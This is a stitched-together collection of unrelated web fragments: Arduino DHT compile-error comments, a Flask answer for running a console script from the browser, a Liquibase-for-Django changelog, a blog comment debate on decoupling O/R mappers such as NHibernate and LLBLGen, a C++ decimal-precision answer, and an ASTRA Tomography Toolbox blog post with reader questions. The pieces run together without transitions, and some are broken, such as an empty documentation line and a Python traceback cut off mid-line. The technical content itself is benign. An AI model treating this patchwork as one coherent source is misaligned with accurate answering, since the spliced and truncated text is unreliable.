The compiler gives me an error that 'dht was not declared in this scope'. I have tried to install the correct DHT libraries multiple times but the problem persists.
Answer 11 months ago
DHT dht(DHTPIN, DHTTYPE);
Reply 8 months ago
Could you please expand? Where do we need to put DHT dht(DHTPIN, DHTTYPE);?
Could you please recommend a DHT library to use aswell?
Reply 10 months ago
Thank you! That helped me fix my compiling error.
9 months ago
C:\Users\Victor\Documents\Arduino\libraries\Blynk-0.5.4\src/BlynkSimpleEsp8266.h:18:21: fatal error: version.h: No such file or directory
#include <version.h>
^
compilation terminated.
Question 1 year ago on Step 15
How to change displayed temp to Fahrenheit?
1 year ago
I'd love to have something like this set up here, the weather is so unpredictable lately!
|
Executing a Python application from the browser
I have written a Python console-based program. It takes a few arguments (like a file name) for execution. I want to run it from the browser... How can I parse these arguments and execute that Python code? Any clues or approaches? Thanks
Answers
Maybe you should clarify your problem. At least I don't fully understand why you want to run a terminal program in the browser.
But if you want to reuse some code you have already written you could use a micro framework like Flask.
Check this example from flask's docs:
from flask import Flask
app = Flask(__name__)

@app.route("/")
def hello():
    return "Hello World!"

if __name__ == "__main__":
    app.run()
So you could write a simple view that accepts the arguments you need and the view would then call your code and return whatever you want, most likely an http response.
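Concretely, a view that takes the file name as a query parameter and hands it to the existing console program could look like this (the script name 'mytool.py' and the 30-second timeout are placeholders for your own code):

import subprocess
from flask import Flask, request

app = Flask(__name__)

@app.route("/run")
def run_tool():
    # e.g. /run?filename=data.txt
    filename = request.args.get("filename", "")
    if not filename:
        return "missing 'filename' parameter", 400

    # Call the existing console program with the argument;
    # 'mytool.py' is a placeholder for your script.
    result = subprocess.run(
        ["python", "mytool.py", filename],
        capture_output=True, text=True, timeout=30,
    )
    return "<pre>" + result.stdout + "</pre>"

if __name__ == "__main__":
    app.run()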
|
Liquibase migrations with Django
Project description
Liquibase migrations for Django
- License: BSD
- Documentation:.
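A rough sketch of the Django settings involved, based only on names mentioned in the changelog below (the exact keys, defaults, and values are assumptions; check the project documentation):

# settings.py (illustrative)
INSTALLED_APPS = [
    # ...
    'liquimigrate',
]

# One Liquibase changelog per configured database
# (LIQUIMIGRATE_CHANGELOG_FILES appears in the 0.2.8 notes below).
LIQUIMIGRATE_CHANGELOG_FILES = {
    'default': 'changelog.xml',
}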
History
0.5.2 (2015-10-22)
- added management to MANIFEST.in
0.5.1 (2015-10-22)
- handle liquibase return codes as an exception
0.5.0 (2015-08-06)
- add documentation and better package layout
0.4.1 (2015-08-06)
- fix for disabling signals
- add possibility to disable emitting pre- and postmigrate signals
- add example project configured with liquibase migrations
0.4.0 (2014-09-28)
- more detailed messages in makemigrations and squashmigrations commands
- Django 1.7+ compatibility + wrapped migration commands
0.3.0 (2014-02-17)
- Update README.rst
- removed version from __init__
- Update README.rst
- back to previous versioning scheme
- cleaned up settings header
- Changed Makefile:pypi to not use iw.dist
- Update README.rst
- possibility to change liquibase jar and connectors via settings
- db name, host, port were overridden by defaults
0.2.8 (2012-02-28)
- Updated documentation about new LIQUIMIGRATE_CHANGELOG_FILES directive Renamed README.txt to README.rst & included into MANIFEST.in Print additional info only in –verbosity 1 model Minor changes for PEP8
- full multidb support
0.2.7 (2011-06-01)
- emit post_sync signal, call loaddata and initial_data
- support for singledb django versions
- fixed driver option
0.2.6 (2011-05-20)
- accepting –driver option from command line
0.2.5 (2011-05-18)
- Better README.txt - link to liquibase
0.2.4 (2011-05-17)
- FIXED: project path
0.2.3 (2011-05-17)
- Updated README.txt about mysql driver & about BSD license
0.2.2 (2011-05-17)
- ADDED: pass other args as liquibase args
0.2.1 (2011-05-17)
- FIXED: too small tuple when using not supported db driver
0.2.0 (2011-04-29)
- ADDED: mysql connector
0.1.2 (2011-04-28)
- ADDED: custom syncdb command
- ADDED: ensure command was given & more README.txt
- FIXED: run the command line rather than just printing it ;)
- FIXED: missing vendor in egg
0.1.1 (2011-04-28)
- REMOVED: old dependencies/namespaces
0.1.0 (2011-04-28)
See my new blog at jeffreypalermo.com.
Nice post. +1 for loosely coupling data access. Those who say "We'll never change our database vendor or O/R mapper" will end up having to explain to their boss later why they need to spend 50K to rewrite the application, and it will be harder to convince their boss that the "new and improved" solution won't need a rewrite in a few years.
~Lee
I'm not sure why you're focusing on the data access layer when you say that you want to keep it independent of the technology. The same applies to the presentation layer and business layer. Technology moves on. ASP and .NET 1.1 are legacy technologies that, unfortunately, we have to support. I don't know what we will be writing apps in in 5 years' time, but it won't be in .NET 3.5. You say that you don't believe there is a business justification for rewriting apps when technology moves on. I believe there is: the cost of support and maintenance. My belief is that when we build apps it should be done on the basis that in 5 years the technology will be outdated and we will have to rewrite it. Giving the business the impression that this is not the case is misleading.
If you see an O/R mapper as a layer which simply pulls data out of a database and stores it into objects and vice versa, creates queries to save data inside objects, then yes, there's little to be said about o/r mappers.
But that's a very naive view on the world. In 2008, O/R mappers are far more powerful than object fetchers. Just because you use nhibernate and think there's nothing to be said about entity graph management in memory for example, because nhibernate doesn't have features in that direction, doesn't mean all O/R mappers don't have these and other advanced features.
Also, the naive view on being able to swap out any o/r mapper you pick clearly shows you never gave it much thought: no matter which data access solution you pick, (so that means: whatever you choose) it will leak through into your own code. This means that your own code will use and will be based on the characteristics provided by the data-access solution of choice: does it do graph maintenance in memory? Does it offer entity views on entity collections for easy in-memory filtering/sorting ? does it offer auditing/authorization? Which concurrency models are supported? Does it offer deep support for distributed systems so you don't have to babysit what's going over the wire? Does it offer what I need out of the box or do I have to invest a couple of man-months writing additional code ?etc. etc..
And as Gary said above: whatever you pick/choose in the other layers is also important and will also be a factor in maintenance of the application, like which UI package is chosen. But isn't it also important how database migrations and feature migrations can be done with the data-access solution of choice? Like: if the database changes in the coming year, how easy is it to adapt to those changes? Is it possible to simply point the data-access solution of choice to the new database schemas and let it migrate the work you've done? Or do you have to do that all by yourself and therefore schedule a lot of extra testing to check whether you didn't miss a spot?
If you're so concerned about maintenance, those things would be on the top of your list. However you don't even mention them.
Jeff, can you give a concrete example of what your abstraction that you're talking about here would look like?
I agree with your point to a large extent which is why I typically build another layer ontop of the whatever data access mechanism I use be it high or low level. This helps with abstraction considerably and would make a conversion relatively painless, but I can't see how to make this completely transparent. So I'd like to know how you can do this in a way that is indeed pluggable?
I've always done this for many different applications mainly because it provides a more consistent model to talk to data for my own work. But in the end I've also found that I have never actually built an application and switched out the data engine completely (backends yes, but DAL engines no). I've seen apps where the engine's been swapped but in the process the app was redesigned and re-written.
So I'm not so sure that this is as valuable as you are making this out to be and maybe falls under the category over-designing for a non realistic scenario :-}
Frans,
So, you are saying he should use LLBLGen?
Mike: where do I say that?
That's the stupidity of these kind of discussions and comparisons: the people who write o/r mappers, and that group is really small, know these systems in and out, what they can do and can't do. If a person of that group points out that the world is bigger than just fetching objects, it might be the case that that person does that because... the world IS actually bigger than just fetching objects? You also don't listen to any MS employee on any MS organized conference? (because, hey, they're just trying to sell you their stuff! ;)).
What I don't like about the article is that it appears to make nhibernate as the most feature rich, standard o/r mapper for .NET. That's simply not the case, on the contrary.
I'm interested that this article doesn't mention IUpdateable or IQueryable. For ASP.NET Dynamic Data, ADO.NET Entity Framework and any other entity technology from Microsoft at the moment, LINQ and providers for these new scaffolding and web service technologies are surely essential. It is great that LLBLGen is supporting these, to provide a key alternative to ADO.NET Entity Framework. I think it's for these specifics that NHibernate will struggle. For new projects, it doesn't play nicely with new takes on rapid development and tooling in Visual Studio.
In other words, too strict de-coupling can actually hinder some enterprise application from quickly creating new interfaces such as for Silverlight or use new Sync type technologies. The blurring of Data Access and Business Logic isn't too evil after all.
@Jeffrey
I completely agree with this approach, both the isolation of the OR/M and the IoC bits. Could you please post a small sample solution demonstrating your technique? If you could keep the mappings simple and provide an IoC swap between NHibernate and LinqToSql you would probably be the first to provide such a sample.
@Frans
I believe you may be one of the most knowledgeable people in the OR/M arena, so with all due respect. The discussion is about architecture and even if LL is the OR/M of choice the points Jeffrey is making are valid. As you have stated Linq is a great step as it provides a unified query language. Linq eliminates the largest hurdle in swapping OR/Ms, eventually all OR/Ms will have Linq providers. We still need a unified session or context but IoC with a simple interface and proxy for the context/session gets us pretty close to a swappable data layer.
I agree with Jeff's fundamental premise: "How do we ensure the long-term maintainability of our systems in the face of constantly changing infrastructure? The answer: Don't couple to infrastructure."
This applies to all aspects of the system regardless of whether or not it is infrastructure, presentation, core, etc.
However, like Gary and Frans said "Whatever you pick / choose in the other layers is also important and will also be a factor in maintenance of the application, like which UI package is chosen."
As much as we would love to have completely pluggable and swappable components and layers in the application, there are usually a number of areas (despite your best attempts at abstraction) where said component has coupled itself a little more deeply that you would have liked.
For our application, we have swapped date pickers twice now. We'd love to do it a third time but it is such a pain.
And for the record, we use LLBLGen Pro. However, we spent a lot of time arguing about whether or not we should use the generated entities in the presentation layer. Gut feel is that we didn't want to do it to avoid coupling the application. However, at the time the benefit of all the plumbing code that was provided (IBindable, etc.) was worth it (CSLA just wasn't working for us at the time).
As so many things in life, there aren't many clear cut answers to everyone's problems. Everybody has to make their decisions based on experiences.
Matt
Frans, now you know why I don't comment on such posts, we are allowed to write them, but unable to comment on them, sigh .... That is not true with Microsoft as was pointed out.
Isolating NHibernate doesn't work in practice. Here's the reason: first, 99% of the time you will have to use the ISession-per-request pattern, where an HttpModule opens an ISession and commits it back at the end. Second, consider that within the business layer you have modified a typical domain object which you got from the ISession. You know NHibernate is tracking your domain object. Thus within your business code you won't be doing anything to save your object, since your session will be committed at the end. Once you have such a coding style, how are you going to replace it? I think trying to loosely couple against NHibernate is impractical and has little benefit.
What Onur Gumus said above is actually a very valid point, a point of much contention between the Hibernate and Spring groups and the motivating factor behind another new framework in Java. Seam is the next step after ORM to provide a proper implementation and ease of use around conversational access to your domain objects (in particular, when they're stored in a transactional system like a RDBMS).
Hibernate is under the covers, but Seam will likely be where Hibernate is in a few years, at least in the Java space.
Thanks so much for this article and this perspective, Jeffrey. So often "the basis on which we should accept or reject an O/R Mapper" gets missed in the rush to use whatever's perceived as the "new hotness" at the time of consideration. nHibernate and Enterprise Library's data helpers certainly have their merits and I don't mean to discount those, but I've personally never seen why they are *quite* as popular as they are.
There is tension in any ORM solution between learning curve, performance, time saved on deliverables, dependencies, redundancy, and maintainability. I started out preferring frameworks to generated code (and so, dependencies to redundancy), but over time I've been converted to the opposite viewpoint and gone the roll-your-own-tool route in the process. Maybe I'm just a System-namespace purist curmudgeon now, but I can live with that label.
Now I use generators instead of templates or helper frameworks. As a result I have a bit of redundancy in my Data Access tier, but I can tolerate that. The domain objects are pure collections of value types, with a DA layer fronted by a simple get / save / serialize to stream / deserialize from stream interface that could quickly be remapped to any persistence or caching mechanism. The generator tool itself is a bit ugly, to be sure (never bothered prettying it up much), but in return it buys me (a) an extremely quick learning curve, even for less experienced developers, (b) respectable runtime performance, (c) no dependencies outside of .NET itself, (d) really rapid CRUD coding, (e) domain objects that are coupled to nothing, and (f) a DA tier that's only coupling is a loose one to SQL Server, but with an interface that would allow for uncomplicated substitution with another provider, whether by tweaking the generator or updating the classes by hand. It may not be "sexy," and it may have a lot of room for improvement in the SQL coupling, but it's functional, easily taught & learned, and leaves very portable code behind.
Anyway, I really appreciated this article. Whatever tool people use, designers would do well to print out your "How do I ensure I'm not coupled to my O/R Mapper?" and "When choosing an O/R Mapper" sections and pin them up where they'll be seen often.
@onur
I think you're missing the point. Your business objects *SHOULDN'T* be saving themselves. That's persistence logic (plumbing), not business or domain logic. It's true that if you remove NHibernate you'd have to replace it with something else since the objects aren't saving themselves, but presumably another ORM that supports persistence ignorance will let you do the same thing without your domain objects being touched.
If for some reason you DID have to remove NHibernate and roll your own, you could do so by replacing the repositories, and the business objects wouldn't have to change. It would be a lot of work, but that's the whole reason we use ORMs.
As for the HttpModule, being able to switch that out with something else is built into NHibernate I believe. That part is actually pretty easy.
I guess de-coupling does get a little fuzzy. When I first used nHibernate, we had the idea to build a data gateway layer that would know about nHibernate. This layer would be ignorant to concrete business entities. The repository layer would know about entities and not about nHibernate. In theory we could then swap out the data gateway for something non-nHibernate.
This is not practical. As soon as you start to write HQL in the repository layer, you have coupling. The repository must be aware of the session... more coupling.
However, it surely is possible to achieve near persistence ignorance in the core business entity layer and also clients higher up the stack.
So +1 for the overall idea of the article. I just inherited a system that has Linq to SQL woven throughout (up to the UI.) Luckily it's a sort of prototype, and the boss has told me I am free to chuck it. However, I could have kept a lot more if the spirit of this article had been followed.
@Gary,
You are correct about the presentation layer and other infrastructure. My company also uses ASP.NET with MonoRail and is starting a large project with the MVC Framework. We consider that as infrastructure and likely to change, and we keep that away from the application core. We treat WinForms and WPF similarly.
I don't expect my clients to have to rewrite an application I delivered after only five short years. If they had to rewrite Headspring's work at five years, we would have a pretty bad reputation. We expect that system we develop will have a very long life. They will see infrastructure technology come and go, and the core will live on.
@Frans,
I definitely did not write a comparison of O/R mappers. Rather, I'm trying to communicate that whatever tool is used, it should be used decoupled from the core of the application's logic. In this way, upgrades and eventual replacement will be possible without rewriting the entire application.
Since you bring up features, I'm sure LLBLGen has many more features than NHibernate. Given that, if folks bought products based on feature lists, our economy would be quite a bit more predictable.
@Rick,
Discussing theory and being impractical is a bit dangerous, and I try not to give any guidance through my blog unless I have specific experience with it through real work. As the CTO of Headspring Systems in Austin, this is a topic we've put quite a bit of work into. We've worked with legacy systems, built new systems and continually upgraded and enhanced systems already built.
This scenario is real for us and practical. We don't have a lot of code around this (I also am leery about overengineering). We accomplish this loose coupling by interfaces and reversing the project reference so that infrastructure references core and not the other way around.
I intend to make a full application available to the community that illustrates the principles we follow as a company. I understand it's difficult for me to clearly communicate without concrete examples.
@Andy,
>"The blurring of Data Access and Business Logic isn't too evil after all."
The coupling of data access and business logic is still "evil". The context I'm living in is long-lived enterprise applications, not small, quick-hit applications. Therefore, these parts need to be de-coupled for maintenance reasons.
I am fully aware of the new technologies and APIs coming from Microsoft, but object-oriented principles and design practices are not altered by these new APIs. Consider them all and then choose which to use on small, trivial apps vs. which to use on long-lived enterprise apps.
@Onur,
Isolating NHibernate _does_ work in practice, and I have 10 systems in production using NHibernate (for various clients) that illustrates how it can be done. I intend to release a reference application to help the community with this issue.
There are some conventions that _could_ bleed over if we aren't careful, but with a disciplined domain-driven design approach, it's not only possible, but quite easy to pull out NHibernate and create new repository implementations which persist in a different way.
@Paul,
At Headspring, we tend not to prefer frameworks. Rather, we enjoy using libraries. For instance, we hand-roll the entire core of our application and then use libraries to keep from writing the following types of code: logging, data access, UI controls, caching, mocking, IoC. . .
We use a framework in ASP.NET, but that's our only compromise. The other libraries used are easily kept behind interfaces, and they don't bleed into the core of the system. These libraries include: Log4Net, NHibernate, various UI controls, Lucene.Net, RhinoMocks, StructureMap, Windsor.
@Tim,
We don't de-couple NHibernate from our repository classes. We intentionally couple them to NHibernate. The core of the application relies on repository interfaces, which merely have implementing classes that are coupled to NHibernate. The core only depends on the interfaces.
To bring in different persistence, we would create new repository classes that all implement the same repository interfaces. By using the same automated test cases (APIs changed to support the new persistence technique), we can reliably ensure that the needed persistence scenarios are supported.
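To give the shape of that arrangement, here is a language-agnostic sketch (rendered in Python, since the thread's C# code isn't shown; every name, including the session API, is illustrative, not an actual NHibernate interface):

from abc import ABC, abstractmethod

class CustomerRepository(ABC):
    """Interface the application core depends on."""
    @abstractmethod
    def get(self, customer_id): ...
    @abstractmethod
    def save(self, customer): ...

class NHibernateCustomerRepository(CustomerRepository):
    """Implementation intentionally coupled to the mapper."""
    def __init__(self, session):
        self.session = session  # hypothetical mapper session object
    def get(self, customer_id):
        return self.session.get("Customer", customer_id)
    def save(self, customer):
        self.session.save(customer)

Swapping persistence then means writing another class that implements the same interface, exactly as described above.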
My experience with O/R Mappers is that you'll have to rewrite at least some code if you decide to switch out SOME code, like querying, no matter how loosely coupled your application was written. As Jeffrey already mentioned, in order to switch out nhibernate he would have to rewrite his repository implementations, but thats it.
NHIbernate is probably the one mapper that allows the LEAST possible coupling to itself. I've used Wilson, LLBLGen, Nolics, and a few others. By far, NHibernate is the least intrusive to your code.
Frans, I'm going to pick on you a bit here, but please don't take it personally:
"This means that your own code will use and will be based on the characteristics provided by the data-access solution of choice...Also, the naive view on being able to swap out any o/r mapper you pick clearly shows you never gave it much thought: no matter which data access solution you pick, (so that means: whatever you choose) it will leak through into your own code"
Not so. If you layer your code correctly, you won't have to change nearly as much. I recently switched a small application from using WilsonORM to NHibernate. It took me about 4 hours, and most of that was changing queries to use HQL instead of OPath. It's true that if it was a bigger application it would have taken longer, but it would have also been easier had I layered things more the way Jeffrey suggests.
"Does it offer entity views on entity collections for easy in-memory filtering/sorting ? does it offer auditing/authorization? Which concurrency models are supported? Does it offer deep support for distributed systems so you don't have to babysit what's going over the wire?"
Those are all great features, but honestly, even for large complex applications, I don't often need all that. I can do an in-memory sort or filter of a collection using lambdas in .NET 3.5 in just a few lines of code. I follow Martin Fowler's first rule of distributed architectures: "Don't distribute" unless there's a real need to. There are other tools to do auditing and authorization. And in any case, do all these BELONG in an O/R mapper? Yes, if you rely on an ORM that has all these features and you use all of them throughout your domain objects, you'll be pretty tied to that ORM. But I see no compelling reason to do that. Those kinds of things don't really belong in my domain model. If the ORM forces you to put them in the domain model, then something is wrong, in my opinion. But if you stick to the core of your application being POCOs and not being tied to the ORM, switching the ORM out really doesn't require a full rewrite.
It really depends on the ORM being used and how its used. Just because many ORMs require strong coupling between themselves and the domain objects doesn't mean all of them do. I think its a good idea to consider that coupling when choosing an ORM and whether or not you want your app to be tied to it 5 years from now.
I do wonder why you would want to swap an orm. Because you start using another database? Nah, that can't be the reason; most mappers support the majority of databases and if not they most likely have an API you can implement. And if it really doesn't support it, you have done something wrong in the beginning.
Or because you reach technical/functional limitations of the ORM? In that case, you didn't do your homework correctly in the first place. You should already have looked at that kind of stuff when you decided what to use.
There is not a single company in the world who would want to switch their existing perfectly working applications which are using NHibernate to EF (Just an example), because it is "available" or "possible". Maybe in an application rebuild or a business decision to migrate fully to EF. But if you start keeping all that kind of things in mind, start preparing your applications for an nuclear warfare! It might happen!
@Z
It depends on the application. For many applications such as small business websites we work on, the ORM will possibly outlive the website, i.e. the website will be rewritten or die before there is a need to switch out an ORM. For other applications with a longer lifespan, a new ORM may come along that works better, no matter how much homework you do ahead of time. Its not unusual for some applications to have a very long life--think of all the cobol apps that are still out there!
As an example, we have this one "small" website with a lot of database functionality that has homemade domain objects that are tightly coupled to a homemade ORM using ADO.NET objects like data readers. I can't switch out the homemade ORM because all the persistence logic is mixed in with the domain objects. But man, would I ever be more productive if I could plug in NHibernate or EF without having to rewrite the whole thing! So in this case, we really would have benefited from the previous developers loosely coupling the ORM from day one.
Another example was at my last job we had some apps using CSLA and one using LLBLGen and we were moving to WilsonORM. The swap was impossible without a rewrite, but desired by management in order to standardize on WIlson.
Most companies don't want to switch out their ORMs precisely because it would involve rewriting their whole application. But if it only involved swapping one layer and could provide standardization on the new ORM and enable more productivity, I think many companies would.
Late to the conversation here, but have a real(ish) example.
If you stick to using Interfaces, such as IRepository<TEntity> and implement concrete repositories such as NHibernateRepository<TEntity>, which has minimal bleed through, so you're practising strict separation of concerns and decoupling then exercises like this become easier:
A quick prototype app, which utilises ISubSonicRepository, suddenly 'evolves' into production and then in a blink of an eye needs to scale...
Just to keep you on your toes (and more likely to happen to all of us) the business decides to Persist People entities in Active Directory, of course augmented with database persisted details...(that hurt, hence my strong endorsement of at least trying to implement Jeffrey's suggestion.)
We recently outsourced an application the data is still available and mutable. However we have to use web services (some XML-RPC, some SOAP).
Therefore I think the above article is incredibly sensible, because not only may you need to change O/RMs but you may need to change persistence technologies entirely. LDAP is very different to SubSonic!
Don't learn the hard way like I did!
Such a heated debate, but also interesting. For my two cents' worth, I agree with the concepts of the article and question anyone using features of an O/RM outside of their business/application layers. The general approach I take is a service-based one, whereby data access is service-based at a CRUD level and at a business process level (two logical layers). Should we want to change the O/RM, we'd only have to swap out the CRUD service layer (it's the only thing that typically accesses the database). Now, having said that, this separation does have its drawbacks, namely that you can't access data as easily as you might like, i.e. via an LLBLGen/NHibernate/LINQ etc. query from other layers, as you've abstracted this into data retrieval/storage interfaces which have no understanding of the implementation. There are definitely pros and cons to any solution, though I think the added abstractions will serve you better in the long run.
As a side note: Am I the only one who doesn't like the concept of DataContexts with O/RMs? Ie they don't play very well in service oriented architectures.
---------------------------------------------
Disclosure: I'm working on an O/RM mapper using a service based approach. Based on templates and the assumption you will change it!
This discussion can be continued here:
jeffreypalermo.com/.../making-it-easy-to-replace-nhibernate-in-five
How can I print a specific number of digits after decimal point in cpp?
For example, if I want to print more than 30 digits after the decimal point when dividing 22 by 7, how can I do that? Please!
Below is a working code snippet that prints a certain number of decimal places. A couple of things to note: 1) the library needed is iomanip; 2) fixed means everything after the decimal point; 3) setprecision() sets the number of digits.
If you don't use fixed, then setprecision() counts the whole digits before the decimal point as well. Since you want 30 digits AFTER the decimal point, you use fixed and setprecision(30). (Keep in mind that a double only carries about 15-17 significant digits, so most of those 30 printed digits will not be meaningful.)
#include <iostream>
#include <iomanip>
using namespace std;

int main() {
    double answer = 22.0 / 7.0;
    cout << "22.0 / 7.0 = " << fixed << setprecision(30) << answer << endl;
    return 0;
}
If you are into computed tomography (CT) from the perspective of algorithm development, or if you want to do the reconstruction yourself instead of using a standard software package (e.g., the one that was included with your scanner), you cannot ignore the ASTRA Tomography Toolbox. Well, I am confident you can, if you put your mind to it, but you shouldn’t. This toolbox is developed by the ASTRA research group (“All Scale Tomographic Reconstruction Antwerp”) of the Vision Lab of the University of Antwerp, together with the Computational Imaging group of the Centrum Wiskunde & Informatica (CWI). Full disclosure: I work at the Vision Lab as a postdoc. However, this article is not sponsored or endorsed by the Vision Lab, it is purely my own opinion.
Quoting from the official description:
It supports 2D parallel and fan beam geometries, and 3D parallel and cone beam. All of them have highly flexible source/detector positioning. A large number of 2D and 3D algorithms are available, including FBP, SIRT, SART, and CGLS. The basic forward and backward projection operations are GPU-accelerated, and directly callable from MATLAB to enable building new algorithms.
During my own PhD research, I have used the ASTRA Toolbox for algorithm development. Because the Toolbox provides GPU implementations of basic components such as projectors, I could use GPU processing already during the experimental stage, allowing me to use real-world (i.e., large) datasets during testing. This is not obvious, since it is often only when an algorithm is complete that a GPU version is written, restricting initial testing to the aptly named academic examples.
MATLAB Wrapper
First of all, to put your mind at rest if you are not a hardcore programmer, the ASTRA Toolbox comes with a user-friendly MATLAB wrapper. All functionality of the Toolbox is available from MATLAB. Since MATLAB is the main way to use the Toolbox, I’ll leave you in the good hands of the official documentation for that, and add an example of my own below that uses the contributed Python wrapper.
Python Wrapper
If you are more of a Python person, there is also a Python wrapper. As an example, I’ve written a Python script that recreates the example with the two white squares on the Wikipedia page on the Radon transform (and additionally also reconstructs the sinogram). The example shows that you can do a lot with only a few lines of code. To keep things brief, there are not a lot of comments, but there are more detailed examples for each part of this script in the samples directory of the Toolbox.
import numpy as np
from scipy import misc
import astra

# Create phantom.
phantom = np.zeros((128, 128))
phantom[32 : 64, 32 : 64] = np.ones((32, 32))
phantom[64 : 96, 64 : 96] = np.ones((32, 32))
misc.imsave('phantom.png', phantom)

# Create geometries and projector.
vol_geom = astra.create_vol_geom(128, 128)
angles = np.linspace(0, np.pi, 180, endpoint=False)
proj_geom = astra.create_proj_geom('parallel', 1., 128, angles)
projector_id = astra.create_projector('linear', proj_geom, vol_geom)

# Create sinogram.
sinogram_id, sinogram = astra.create_sino(phantom, projector_id)
misc.imsave('sinogram.png', sinogram)

# Create reconstruction using SIRT.
reconstruction_id = astra.data2d.create('-vol', vol_geom)
cfg = astra.astra_dict('SIRT')
cfg['ReconstructionDataId'] = reconstruction_id
cfg['ProjectionDataId'] = sinogram_id
cfg['ProjectorId'] = projector_id
algorithm_id = astra.algorithm.create(cfg)
astra.algorithm.run(algorithm_id, 100)
reconstruction = astra.data2d.get(reconstruction_id)
misc.imsave('reconstruction.png', reconstruction)

# Cleanup.
astra.algorithm.delete(algorithm_id)
astra.data2d.delete(reconstruction_id)
astra.data2d.delete(sinogram_id)
astra.projector.delete(projector_id)
The output of this script is shown below. On the left is the phantom with the two white squares. In the middle is the sinogram, which contains a (2D) projection in each horizontal line. From this sinogram, the reconstruction on the right was created through the algebraic algorithm SIRT.
For more information on tomography itself, have a look at my series of articles on that subject. There is also a tutorial on creating a 3D reconstruction from 2D cone-beam projections that you might find interesting if you are working with your own datasets.
[update] This post was selected for Writing Clinic at DailyBlogTips! As a result, I was able to make several improvements to the text. Thanks again, Ali!
[update 2] Updated the homepage of the Toolbox; added CWI as a developer; reformulated the text to reflect that the Python wrapper is now an integral part of the Toolbox, instead of a contributed module.
I'm pretty new to using a lot of external libraries in python. My question is, I've downloaded the files for PyASTRA, but I only see install instructions for windows and linux. Do you know if it's possible to install them and use them on an OS X machine?
I’m sorry to have to inform you that OS X is not supported at this time… On a separate note, you don’t have to download the Python interface separately anymore, since it is included in the main ASTRA Toolbox since version 1.6.
hello
I have some 2D X-ray images of an aluminium model. I want to get the cross sectional CT image of that model. Is it possible using this software? If possible then how?
If your data is suitable for CT reconstruction, i.e., if you have a sufficient number of images that were taken with a CT scanner, or at least with a fixed source and detector and a rotating stage, then this should be relatively easy. I would like to point you to the examples that are included with the ASTRA Toolbox. Also note that your images must be preprocessed to make them true projections, as I explain in my series of articles on tomography. If your data consists of only a few images, or was taken with unknown source and detector positions, then it will be much more difficult or even impossible.
Thank you for your answer. I have all the information about detector positions and also all the X-ray images as well. But the problem is, I got confused about the ASTRA Toolbox. Inside the toolbox, all the examples use a single phantom and then rotate it in different directions. But my question is, how can I use all the available projections for CT reconstruction? I mean, I want to use a series of images rather than using a single image and rotating it in different directions. Really waiting for your response.
The examples in the Toolbox often start from a phantom to create a dataset. Of course, you already have a dataset, and only need the second part of the example. It might also be confusing that the examples are often in 2D, where the “X-ray images” are then 1D, and grouped in a so-called sinogram. You could create a sinogram like that from your data by taking a single row from each of them, but it’s probably easier to immediately create a 3D reconstruction. Another tip is that, if your dataset was recorded using a typical source and a flat-panel detector, you’ll probably need to use a cone-beam geometry (and not a parallel-beam one).
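As a sketch of the "single row from each image" option mentioned above (the array name, number of images, and chosen row are all assumptions):

import numpy as np

# images: list of 2D projection arrays, one per angle (assumed to exist)
row = 100  # detector row to reconstruct

# Stack the same row from every projection into a sinogram:
# resulting shape is (n_angles, n_detector_columns)
sinogram = np.stack([img[row, :] for img in images])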
Hi, great toolbox!!
I was wondering if it is possible to perform 3D conebeam reconstructions without GPU. I've only found the functions for GPU. Thanks in advance!
Thanks! It is indeed not possible to perform 3D cone beam reconstructions without a GPU, because there are no CPU versions of the 3D algorithms in the Toolbox. And, of course, for cone beam you cannot run a 2D algorithm on a slice-by-slice basis like you can do for parallel beam…
Ok, thanks a lot for the answer Tom!
Hi !
Thanks for your very nice webpage. I am discovering the astra toolbox and I was wondering how to use it (for 3D cone beam) in colab ?
Thanks in advance,
Stephane
I have no experience with Colab, Sorry…
In response to D M BAPPY on 4/12/16, you mentioned the examples start from a phantom to create the dataset. I have X-ray images from a flat panel detector, and the proj_geom and vol_geom are understood. My question is how to get the projection data into sinograms. All the examples seem to forward project the phantom object to get the sinograms which the reconstruction then uses. I am missing how to get the normalized projection data into a sinogram so a reconstruction can then be made. What am I missing?
I am responding to your response to D M BAPPY on 4/12/16. I have cone beam projections for a flat panel and I have set up proj_geom and vol_geom and that all makes sense. What is not clear is how to get sinograms as the reconstruction needs the sinograms to make the reconstruction. All the examples make the sinograms from forward projection of the object. I don't see how to get sinograms from projection data or how to feed projection data into a reconstruction algorithm. Any clarification for this would let me experiment with real world data. Thanks.
I can see that function names such as "astra_create_sino3d_cuda" might be confusing in this respect. In practice, the 3D volume that these functions produce is simply a stack of images, exactly like the images that you get from a scanner. However, there are also sinograms in the data volume. You get these by slicing the volume in a different direction. Sinograms are typically how projection data is viewed when tomography is done in 2D, so when a single slice is reconstructed. But, in 3D, projection data are just images. Hence, there is no need to create sinograms...
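In the Python wrapper, the same slicing idea looks roughly like this (the shapes are assumptions for illustration; check the layout of your own data):

import numpy as np

# Stack of 180 projection images of 128 rows x 256 columns each
projections = np.random.rand(180, 128, 256)

# ASTRA's 3D data layout is (detector rows, angles, detector columns),
# so transpose the image stack first
data = np.transpose(projections, (1, 0, 2))

# Slicing along the first axis now yields a sinogram per detector row
sinogram = data[64]  # shape (180, 256)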
Hi Paul,
Have you find a solution to your problem? I have the same questions about how to feed my 2D projected images into Astra for a cone beam reconstruction. If you have a piece of code to share it would be greatly appreciated. It is strange that people seem to avoid giving realistic examples. We cannot use synthetic images of phantoms all the time!
MRB
I would start from example s007_3d_reconstruction.m and adapt that. First of all, you have to initialize proj_geom with the projection geometry of your data, of course. Then, instead of generating the projections from a phantom using astra_create_sino3d_cuda(), create a projection data object directly using astra_mex_data3d('create', '-proj3d', proj_geom, your_data) (see also example s006_3d_data.m). Does this help?
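For Python users, the rough equivalent of that MATLAB call should be the following (hedged; proj_geom and your_data are placeholders for your own geometry and projection stack):

import astra

# Create a 3D projection data object directly from your own data
proj_id = astra.data3d.create('-proj3d', proj_geom, your_data)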
Hello Tom,
As DM Bappy, PauC and Michel Bouchard, I need to reconstruct data, starting from real projections (Tiff files) produced by a CBCT scanner. I tried to follow your advices without any success. Is it possible to get an exemple of code? Thanks
Okay, you guys have convinced me. I’ll write a new post with an example that starts from projection images. You will have to give me a few weeks to find the time to do that, I’m afraid, but it’ll come!
It took a while, but there is now a brand spanking new tutorial on creating a 3D reconstruction from 2D cone-beam projections. Go there for more information!
Hi,
I'm on Windows 7Pro and I have installed Python 3.6 with Miniconda and right after that the Astra package with
"conda install -c astra-toolbox astra-toolbox"
I'm trying to run your example and it seems I'm missing something from scipy.misc? I'm new with all the Python environment stuff, any idea what I'm missing?
Traceback (most recent call last):
File "D:/Tomo/Test.py", line 11, in
misc.imsave('phantom.png', phantom)
